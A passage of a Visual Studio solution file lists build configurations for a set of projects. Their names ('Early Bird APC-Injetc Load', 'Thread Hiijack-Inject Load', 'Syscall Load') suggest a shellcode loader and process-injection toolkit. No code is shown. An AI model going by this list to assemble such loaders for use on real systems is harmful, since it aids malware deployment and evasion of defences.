19 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "CreateThreatPoolWait Load", "plug\CreateThreatPoolWait Load\CreateThreatPoolWait Load.vcxproj", "{E4458817-99D0-4463-AC97-A91E1F9FB3E1}"
20 | EndProject
21 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "Fiber Load", "plug\Fiber Load\Fiber Load.vcxproj", "{A724B8F7-FDF3-441B-BB1D-11C1C6FDC64B}"
22 | EndProject
23 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "NtTestAlert Load", "plug\NtTestAlert Load\NtTestAlert Load.vcxproj", "{0E01D108-8DD7-4164-BABD-5257095F0CAF}"
24 | EndProject
25 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "SEH Except Load", "plug\SEH Except Load\SEH Except Load.vcxproj", "{8C71DB50-A5B1-4354-A7C7-901E36DDC8AB}"
26 | EndProject
27 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "TLS Callback Load", "plug\TLS Callback Load\TLS Callback Load.vcxproj", "{E804DA50-1B3D-40A8-9FA5-D0A2B427C727}"
28 | EndProject
29 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "Dynamic Load", "plug\Dynamic Load\Dynamic Load.vcxproj", "{E09E4077-06F1-4A26-AFBA-D5FFE8BE10B3}"
30 | EndProject
31 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "Dynamic Load plus", "plug\Dynamic Load plus\Dynamic Load plus.vcxproj", "{77301751-93B6-4748-87CE-BEABD468F549}"
32 | EndProject
33 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "Direct Load", "plug\Direct Load\Direct Load.vcxproj", "{95367D52-E3A0-46BF-BCAA-AAC13EAF244D}"
34 | EndProject
35 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "NtCreateSection-Inject Load", "plug\NtCreateSection-Inject Load\NtCreateSection-Inject Load.vcxproj", "{53C190DB-62BA-4D22-BEB9-BAC5F35D8893}"
36 | EndProject
37 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "Syscall Load", "plug\Syscall Load\Syscall Load.vcxproj", "{7A811860-B9FC-4F64-BE80-DE0D30551A21}"
38 | EndProject
39 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "APC-Ijnect Load", "plug\APC-Ijnect Load\APC-Ijnect Load.vcxproj", "{85B4ED76-7171-4CDF-B909-654E77F54FA4}"
40 | EndProject
41 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "Early Bird APC-Injetc Load", "plug\Early Bird APC-Injetc Load\Early Bird APC-Injetc Load.vcxproj", "{F5D3E249-2D2F-4C8F-99D9-4ED661ADBC57}"
42 | EndProject
43 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "OEP Hiijack-Inject Load", "plug\OEP Hiijack-Inject Load\OEP Hiijack-Inject Load.vcxproj", "{7CCFF851-1E2C-4EAD-8415-BB4CBB96FFE0}"
44 | EndProject
45 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "Thread Hiijack-Inject Load", "plug\Thread Hiijack-Inject Load\Thread Hiijack-Inject Load.vcxproj", "{9C8E8054-B951-44F4-9B6C-9021BE918EC8}"
46 | EndProject
47 | Global
48 | GlobalSection(SolutionConfigurationPlatforms) = preSolution
49 | Debug|x64 = Debug|x64
50 | Debug|x86 = Debug|x86
51 | Release|x64 = Release|x64
52 | Release|x86 = Release|x86
53 | EndGlobalSection
54 | GlobalSection(ProjectConfigurationPlatforms) = postSolution
55 | {44ED408B-59F3-4A73-BEF3-AD7F274AEC54}.Debug|x64.ActiveCfg = Debug|x64
56 | {44ED408B-59F3-4A73-BEF3-AD7F274AEC54}.Debug|x64.Build.0 = Debug|x64
57 | {44ED408B-59F3-4A73-BEF3-AD7F274AEC54}.Debug|x86.ActiveCfg = Debug|Win32
58 | {44ED408B-59F3-4A73-BEF3-AD7F274AEC54}.Debug|x86.Build.0 = Debug|Win32
59 | {44ED408B-59F3-4A73-BEF3-AD7F274AEC54}.Release|x64.ActiveCfg = Release|x64
60 | {44ED408B-59F3-4A73-BEF3-AD7F274AEC54}.Release|x64.Build.0 = Release|x64
61 | {44ED408B-59F3-4A73-BEF3-AD7F274AEC54}.Release|x86.ActiveCfg = Release|Win32
62 | {44ED408B-59F3-4A73-BEF3-AD7F274AEC54}.Release|x86.Build.0 = Release|Win32
63 | {E4458817-99D0-4463-AC97-A91E1F9FB3E1}.Debug|x64.ActiveCfg = Debug|x64
64 | {E4458817-99D0-4463-AC97-A91E1F9FB3E1}.Debug|x64.Build.0 = Debug|x64
65 | {E4458817-99D0-4463-AC97-A91E1F9FB3E1}.Debug|x86.ActiveCfg = Debug|Win32
66 | {E4458817-99D0-4463-AC97-A91E1F9FB3E1}.Debug|x86.Build.0 = Debug|Win32
67 | {E4458817-99D0-4463-AC97-A91E1F9FB3E1}.Release|x64.ActiveCfg = Release|x64
68 | {E4458817-99D0-4463-AC97-A91E1F9FB3E1}.Release|x64.Build.0 = Release|x64
69 | {E4458817-99D0-4463-AC97-A91E1F9FB3E1}.Release|x86.ActiveCfg = Release|Win32
70 | {E4458817-99D0-4463-AC97-A91E1F9FB3E1}.Release|x86.Build.0 = Release|Win32
71 | {A724B8F7-FDF3-441B-BB1D-11C1C6FDC64B}.Debug|x64.ActiveCfg = Debug|x64
72 | {A724B8F7-FDF3-441B-BB1D-11C1C6FDC64B}.Debug|x64.Build.0 = Debug|x64
73 | {A724B8F7-FDF3-441B-BB1D-11C1C6FDC64B}.Debug|x86.ActiveCfg = Debug|Win32
74 | {A724B8F7-FDF3-441B-BB1D-11C1C6FDC64B}.Debug|x86.Build.0 = Debug|Win32
75 | {A724B8F7-FDF3-441B-BB1D-11C1C6FDC64B}.Release|x64.ActiveCfg = Release|x64
76 | {A724B8F7-FDF3-441B-BB1D-11C1C6FDC64B}.Release|x64.Build.0 = Release|x64
77 | {A724B8F7-FDF3-441B-BB1D-11C1C6FDC64B}.Release|x86.ActiveCfg = Release|Win32
78 | {A724B8F7-FDF3-441B-BB1D-11C1C6FDC64B}.Release|x86.Build.0 = Release|Win32
79 | {0E01D108-8DD7-4164-BABD-5257095F0CAF}.Debug|x64.ActiveCfg = Debug|x64
80 | {0E01D108-8DD7-4164-BABD-5257095F0CAF}.Debug|x64.Build.0 = Debug|x64
81 | {0E01D108-8DD7-4164-BABD-5257095F0CAF}.Debug|x86.ActiveCfg = Debug|Win32
82 | {0E01D108-8DD7-4164-BABD-5257095F0CAF}.Debug|x86.Build.0 = Debug|Win32
83 | {0E01D108-8DD7-4164-BABD-5257095F0CAF}.Release|x64.ActiveCfg = Release|x64
84 | {0E01D108-8DD7-4164-BABD-5257095F0CAF}.Release|x64.Build.0 = Release|x64
85 | {0E01D108-8DD7-4164-BABD-5257095F0CAF}.Release|x86.ActiveCfg = Release|Win32
86 | {0E01D108-8DD7-4164-BABD-5257095F0CAF}.Release|x86.Build.0 = Release|Win32
87 | {8C71DB50-A5B1-4354-A7C7-901E36DDC8AB}.Debug|x64.ActiveCfg = Debug|x64
88 | {8C71DB50-A5B1-4354-A7C7-901E36DDC8AB}.Debug|x64.Build.0 = Debug|x64
89 | {8C71DB50-A5B1-4354-A7C7-901E36DDC8AB}.Debug|x86.ActiveCfg = Debug|Win32
90 | {8C71DB50-A5B1-4354-A7C7-901E36DDC8AB}.Debug|x86.Build.0 = Debug|Win32
91 | {8C71DB50-A5B1-4354-A7C7-901E36DDC8AB}.Release|x64.ActiveCfg = Release|x64
92 | {8C71DB50-A5B1-4354-A7C7-901E36DDC8AB}.Release|x64.Build.0 = Release|x64
93 | {8C71DB50-A5B1-4354-A7C7-901E36DDC8AB}.Release|x86.ActiveCfg = Release|Win32
94 | {8C71DB50-A5B1-4354-A7C7-901E36DDC8AB}.Release|x86.Build.0 = Release|Win32
95 | {E804DA50-1B3D-40A8-9FA5-D0A2B427C727}.Debug|x64.ActiveCfg = Debug|x64
96 | {E804DA50-1B3D-40A8-9FA5-D0A2B427C727}.Debug|x64.Build.0 = Debug|x64
97 | {E804DA50-1B3D-40A8-9FA5-D0A2B427C727}.Debug|x86.ActiveCfg = Debug|Win32
98 | {E804DA50-1B3D-40A8-9FA5-D0A2B427C727}.Debug|x86.Build.0 = Debug|Win32
99 | {E804DA50-1B3D-40A8-9FA5-D0A2B427C727}.Release|x64.ActiveCfg = Release|x64
100 | {E804DA50-1B3D-40A8-9FA5-D0A2B427C727}.Release|x64.Build.0 = Release|x64
101 | {E804DA50-1B3D-40A8-9FA5-D0A2B427C727}.Release|x86.ActiveCfg = Release|Win32
102 | {E804DA50-1B3D-40A8-9FA5-D0A2B427C727}.Release|x86.Build.0 = Release|Win32
103 | {E09E4077-06F1-4A26-AFBA-D5FFE8BE10B3}.Debug|x64.ActiveCfg = Debug|x64
104 | {E09E4077-06F1-4A26-AFBA-D5FFE8BE10B3}.Debug|x64.Build.0 = Debug|x64
105 | {E09E4077-06F1-4A26-AFBA-D5FFE8BE10B3}.Debug|x86.ActiveCfg = Debug|Win32
106 | {E09E4077-06F1-4A26-AFBA-D5FFE8BE10B3}.Debug|x86.Build.0 = Debug|Win32
107 | {E09E4077-06F1-4A26-AFBA-D5FFE8BE10B3}.Release|x64.ActiveCfg = Release|x64
108 | {E09E4077-06F1-4A26-AFBA-D5FFE8BE10B3}.Release|x64.Build.0 = Release|x64
109 | {E09E4077-06F1-4A26-AFBA-D5FFE8BE10B3}.Release|x86.ActiveCfg = Release|Win32
110 | {E09E4077-06F1-4A26-AFBA-D5FFE8BE10B3}.Release|x86.Build.0 = Release|Win32
111 | {77301751-93B6-4748-87CE-BEABD468F549}.Debug|x64.ActiveCfg = Debug|x64
112 | {77301751-93B6-4748-87CE-BEABD468F549}.Debug|x64.Build.0 = Debug|x64
113 | {77301751-93B6-4748-87CE-BEABD468F549}.Debug|x86.ActiveCfg = Debug|Win32
114 | {77301751-93B6-4748-87CE-BEABD468F549}.Debug|x86.Build.0 = Debug|Win32
115 | {77301751-93B6-4748-87CE-BEABD468F549}.Release|x64.ActiveCfg = Release|x64
116 | {77301751-93B6-4748-87CE-BEABD468F549}.Release|x64.Build.0 = Release|x64
117 | {77301751-93B6-4748-87CE-BEABD468F549}.Release|x86.ActiveCfg = Release|Win32
118 | {77301751-93B6-4748-87CE-BEABD468F549}.Release|x86.Build.0 = Release|Win32
119 | {95367D52-E3A0-46BF-BCAA-AAC13EAF244D}.Debug|x64.ActiveCfg = Debug|x64
120 | {95367D52-E3A0-46BF-BCAA-AAC13EAF244D}.Debug|x64.Build.0 = Debug|x64
121 | {95367D52-E3A0-46BF-BCAA-AAC13EAF244D}.Debug|x86.ActiveCfg = Debug|Win32
122 | {95367D52-E3A0-46BF-BCAA-AAC13EAF244D}.Debug|x86.Build.0 = Debug|Win32
123 | {95367D52-E3A0-46BF-BCAA-AAC13EAF244D}.Release|x64.ActiveCfg = Release|x64
124 | {95367D52-E3A0-46BF-BCAA-AAC13EAF244D}.Release|x64.Build.0 = Release|x64
125 | {95367D52-E3A0-46BF-BCAA-AAC13EAF244D}.Release|x86.ActiveCfg = Release|Win32
126 | {95367D52-E3A0-46BF-BCAA-AAC13EAF244D}.Release|x86.Build.0 = Release|Win32
127 | {53C190DB-62BA-4D22-BEB9-BAC5F35D8893}.Debug|x64.ActiveCfg = Debug|x64
128 | {53C190DB-62BA-4D22-BEB9-BAC5F35D8893}.Debug|x64.Build.0 = Debug|x64
129 | {53C190DB-62BA-4D22-BEB9-BAC5F35D8893}.Debug|x86.ActiveCfg = Debug|Win32
130 | {53C190DB-62BA-4D22-BEB9-BAC5F35D8893}.Debug|x86.Build.0 = Debug|Win32
131 | {53C190DB-62BA-4D22-BEB9-BAC5F35D8893}.Release|x64.ActiveCfg = Release|x64
132 | {53C190DB-62BA-4D22-BEB9-BAC5F35D8893}.Release|x64.Build.0 = Release|x64
133 | {53C190DB-62BA-4D22-BEB9-BAC5F35D8893}.Release|x86.ActiveCfg = Release|Win32
134 | {53C190DB-62BA-4D22-BEB9-BAC5F35D8893}.Release|x86.Build.0 = Release|Win32
135 | {7A811860-B9FC-4F64-BE80-DE0D30551A21}.Debug|x64.ActiveCfg = Debug|x64
136 | {7A811860-B9FC-4F64-BE80-DE0D30551A21}.Debug|x64.Build.0 = Debug|x64
137 | {7A811860-B9FC-4F64-BE80-DE0D30551A21}.Debug|x86.ActiveCfg = Debug|Win32
138 | {7A811860-B9FC-4F64-BE80-DE0D30551A21}.Debug|x86.Build.0 = Debug|Win32
139 | {7A811860-B9FC-4F64-BE80-DE0D30551A21}.Release|x64.ActiveCfg = Release|x64
140 | {7A811860-B9FC-4F64-BE80-DE0D30551A21}.Release|x64.Build.0 = Release|x64
141 | {7A811860-B9FC-4F64-BE80-DE0D30551A21}.Release|x86.ActiveCfg = Release|Win32
142 | {7A811860-B9FC-4F64-BE80-DE0D30551A21}.Release|x86.Build.0 = Release|Win32
143 | {85B4ED76-7171-4CDF-B909-654E77F54FA4}.Debug|x64.ActiveCfg = Debug|x64
144 | {85B4ED76-7171-4CDF-B909-654E77F54FA4}.Debug|x64.Build.0 = Debug|x64
145 | {85B4ED76-7171-4CDF-B909-654E77F54FA4}.Debug|x86.ActiveCfg = Debug|Win32
146 | {85B4ED76-7171-4CDF-B909-654E77F54FA4}.Debug|x86.Build.0 = Debug|Win32
147 | {85B4ED76-7171-4CDF-B909-654E77F54FA4}.Release|x64.ActiveCfg = Release|x64
148 | {85B4ED76-7171-4CDF-B909-654E77F54FA4}.Release|x64.Build.0 = Release|x64
149 | {85B4ED76-7171-4CDF-B909-654E77F54FA4}.Release|x86.ActiveCfg = Release|Win32
150 | {85B4ED76-7171-4CDF-B909-654E77F54FA4}.Release|x86.Build.0 = Release|Win32
151 | {F5D3E249-2D2F-4C8F-99D9-4ED661ADBC57}.Debug|x64.ActiveCfg = Debug|x64
152 | {F5D3E249-2D2F-4C8F-99D9-4ED661ADBC57}.Debug|x64.Build.0 = Debug|x64
153 | {F5D3E249-2D2F-4C8F-99D9-4ED661ADBC57}.Debug|x86.ActiveCfg = Debug|Win32
154 | {F5D3E249-2D2F-4C8F-99D9-4ED661ADBC57}.Debug|x86.Build.0 = Debug|Win32
155 | {F5D3E249-2D2F-4C8F-99D9-4ED661ADBC57}.Release|x64.ActiveCfg = Release|x64
156 | {F5D3E249-2D2F-4C8F-99D9-4ED661ADBC57}.Release|x64.Build.0 = Release|x64
157 | {F5D3E249-2D2F-4C8F-99D9-4ED661ADBC57}.Release|x86.ActiveCfg = Release|Win32
158 | {F5D3E249-2D2F-4C8F-99D9-4ED661ADBC57}.Release|x86.Build.0 = Release|Win32
159 | {7CCFF851-1E2C-4EAD-8415-BB4CBB96FFE0}.Debug|x64.ActiveCfg = Debug|x64
160 | {7CCFF851-1E2C-4EAD-8415-BB4CBB96FFE0}.Debug|x64.Build.0 = Debug|x64
161 | {7CCFF851-1E2C-4EAD-8415-BB4CBB96FFE0}.Debug|x86.ActiveCfg = Debug|Win32
162 | {7CCFF851-1E2C-4EAD-8415-BB4CBB96FFE0}.Debug|x86.Build.0 = Debug|Win32
163 | {7CCFF851-1E2C-4EAD-8415-BB4CBB96FFE0}.Release|x64.ActiveCfg = Release|x64
164 | {7CCFF851-1E2C-4EAD-8415-BB4CBB96FFE0}.Release|x64.Build.0 = Release|x64
165 | {7CCFF851-1E2C-4EAD-8415-BB4CBB96FFE0}.Release|x86.ActiveCfg = Release|Win32
166 | {7CCFF851-1E2C-4EAD-8415-BB4CBB96FFE0}.Release|x86.Build.0 = Release|Win32
167 | {9C8E8054-B951-44F4-9B6C-9021BE918EC8}.Debug|x64.ActiveCfg = Debug|x64
168 | {9C8E8054-B951-44F4-9B6C-9021BE918EC8}.Debug|x64.Build.0 = Debug|x64
169 | {9C8E8054-B951-44F4-9B6C-9021BE918EC8}.Debug|x86.ActiveCfg = Debug|Win32
170 | {9C8E8054-B951-44F4-9B6C-9021BE918EC8}.Debug|x86.Build.0 = Debug|Win32
171 | {9C8E8054-B951-44F4-9B6C-9021BE918EC8}.Release|x64.ActiveCfg = Release|x64
172 | {9C8E8054-B951-44F4-9B6C-9021BE918EC8}.Release|x64.Build.0 = Release|x64
173 | {9C8E8054-B951-44F4-9B6C-9021BE918EC8}.Release|x86.ActiveCfg = Release|Win32
174 | {9C8E8054-B951-44F4-9B6C-9021BE918EC8}.Release|x86.Build.0 = Release|Win32
175 | EndGlobalSection
176 | GlobalSection(SolutionProperties) = preSolution
177 | HideSolutionNode = FALSE
178 | EndGlobalSection
179 | GlobalSection(NestedProjects) = preSolution
180 | {44ED408B-59F3-4A73-BEF3-AD7F274AEC54} = {A627454C-01C6-4811-871A-28194598E2C9}
181 | {7F17ED50-B0CD-4BF8-B78F-76F5DBA07F9C} = {714E11DF-8A6C-408B-95BD-D63BA510488E}
182 | {CA099911-8087-4632-96A5-A85511712F38} = {714E11DF-8A6C-408B-95BD-D63BA510488E}
183 | {E4458817-99D0-4463-AC97-A91E1F9FB3E1} = {7F17ED50-B0CD-4BF8-B78F-76F5DBA07F9C}
184 | {A724B8F7-FDF3-441B-BB1D-11C1C6FDC64B} = {7F17ED50-B0CD-4BF8-B78F-76F5DBA07F9C}
185 | {0E01D108-8DD7-4164-BABD-5257095F0CAF} = {7F17ED50-B0CD-4BF8-B78F-76F5DBA07F9C}
186 | {8C71DB50-A5B1-4354-A7C7-901E36DDC8AB} = {7F17ED50-B0CD-4BF8-B78F-76F5DBA07F9C}
187 | {E804DA50-1B3D-40A8-9FA5-D0A2B427C727} = {7F17ED50-B0CD-4BF8-B78F-76F5DBA07F9C}
188 | {E09E4077-06F1-4A26-AFBA-D5FFE8BE10B3} = {7F17ED50-B0CD-4BF8-B78F-76F5DBA07F9C}
189 | {77301751-93B6-4748-87CE-BEABD468F549} = {7F17ED50-B0CD-4BF8-B78F-76F5DBA07F9C}
190 | {95367D52-E3A0-46BF-BCAA-AAC13EAF244D} = {7F17ED50-B0CD-4BF8-B78F-76F5DBA07F9C}
191 | {53C190DB-62BA-4D22-BEB9-BAC5F35D8893} = {CA099911-8087-4632-96A5-A85511712F38}
192 | {7A811860-B9FC-4F64-BE80-DE0D30551A21} = {7F17ED50-B0CD-4BF8-B78F-76F5DBA07F9C}
193 | {85B4ED76-7171-4CDF-B909-654E77F54FA4} = {CA099911-8087-4632-96A5-A85511712F38}
194 | {F5D3E249-2D2F-4C8F-99D9-4ED661ADBC57} = {CA099911-8087-4632-96A5-A85511712F38}
195 | {7CCFF851-1E2C-4EAD-8415-BB4CBB96FFE0} = {CA099911-8087-4632-96A5-A85511712F38}
196 | {9C8E8054-B951-44F4-9B6C-9021BE918EC8} = {CA099911-8087-4632-96A5-A85511712F38}
197 | EndGlobalSection
198 | EndGlobal
199 |
--------------------------------------------------------------------------------